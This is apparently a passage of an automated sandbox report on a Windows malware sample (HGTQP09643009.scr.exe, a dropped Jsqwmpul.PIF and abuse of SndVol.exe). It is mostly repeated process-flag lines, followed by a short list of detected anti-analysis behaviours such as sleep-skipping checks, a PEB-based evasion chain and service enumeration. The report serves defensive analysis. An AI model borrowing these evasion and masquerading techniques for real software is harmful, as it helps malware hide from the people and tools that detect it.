Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_0291CC94

0_2_0291CC94

Delayed program exit found

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040F7A7 Sleep,ExitProcess,		3_2_0040F7A7
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05360474 Sleep,ExitProcess,		3_2_05360474

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-24201

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

4_2_0040DD85

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		3_2_0041A748
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		3_2_0536B415

Source: C:\Windows\SysWOW64\SndVol.exe	Window / User API: threadDelayed 9478			Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Window / User API: foregroundWindowGot 1756			Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	API coverage: 9.2 %
Source: C:\Windows\SysWOW64\SndVol.exe	API coverage: 9.5 %

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_0291CC94

0_2_0291CC94

Source: C:\Windows\SysWOW64\SndVol.exe TID: 2860	Thread sleep time: -73500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 5808	Thread sleep time: -474000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 5808	Thread sleep time: -28434000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_029058B4
